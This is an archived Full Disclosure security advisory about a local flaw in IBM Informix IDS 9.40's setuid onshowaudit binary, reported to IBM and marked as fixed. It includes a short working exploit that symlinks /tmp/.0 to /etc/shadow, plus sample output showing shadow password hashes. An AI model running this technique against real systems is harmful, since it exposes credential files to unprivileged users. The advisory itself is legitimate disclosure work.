Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

OPEN3S-2003-08-08-eng-informix-onshowaudit

From: pask () open3s com
Date: Tue, 27 Jan 2004 15:34:45 +0100 (CET)


       ----------========== OPEN3S-2003-08-08-eng-informix-onshowaudit ==========----------

 Title:    Local Vulnerability in IBM Informix IDS v9.40 onshowaudit binary
 Date:     08-08-2003
 Platform: Only tested in Linux but can be exported to others.
 Impact:   Users with exec perm over ./bin/onshowaudit can read  
           all system files.
 Author:   Juan Manuel Pascual Escriba <pask () open3s com>
 Status:   Solved by IBM Corp


PROBLEM SUMMARY:

Informix user or any user with AAO privileges can execute onshowaudit. This binary 
is owned by root.informix with 6755 permision. As the endly point of its execution 
thread onshowaudit try to read some files in /tmp directory without dropping any 
privileges.

It's easy for an intruder to make a link to /etc/shadow or /root/.ssh/authorized_keys 
of one of this files and read this files.


DESCRIPTION

Informix user or any user with AAO privileges an execute onshowaudit. This binary
is owned by root.informix with 6755 permision. As the endly point of its execution
thread onshowaudit reads

16231 open("/tmp/.0", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.1", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.2", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
....
16231 open("/tmp/.97", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 open("/tmp/.98", O_RDONLY|O_LARGEFILE) = -1 ENOENT (No such file or directory)
16231 write(2, "Cannot open file \n", 18) = 18

without dropping privileges. It's easy to make a link:

[informix@dimoni tmp]$ ls -alc /etc/shadow
-r--------    1 root     root         1020 Aug 10 01:59 /etc/shadow
[informix@dimoni tmp]$ ln -s /etc/shadow .0
informix@dimoni tmp]$ /home/informix-9.40/bin/onshowaudit

wait for the output
....
aaa:!!:11635:0:99999:7:::
pask:$1$4xnwc%eu$DfkZv8cTe6wywzom0:11938:0:99999:7:::
bbb:!!:11636:0:99999:7:::
cccc:!!:11636:0:99999:7:::
ddddd:!!:11647:0:99999:7:::
aaaaaa:!!:11806:0:99999:7:::
wwwwww:!!:11833:0:99999:7:::
zzz:!!:12027:0:99999:7:::
informix:$1$G8jXuut9eWsIiDsgwQb1KcPcfA/:12272:0:99999:7:::

Program Over.


IMPACT:

Any user with AAO privileges over onshowaudit could read any system file. 



STATUS 

Reported to IBM security team at 11th of August 2003

See more infomartion about this vulnerability and workaround at:
http://www-1.ibm.com/support/docview.wss?uid=swg21153336

This vulnerability was managed in an efficient manner by Jonathan Leffler
from IBM Informix Database Engineering Team.


--------------------------------------------------
This vulnerability was researched by:
Juan Manuel Pascual Escriba            pask () open3s com
Barcelona - Spain                      http://www.open3s.com



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: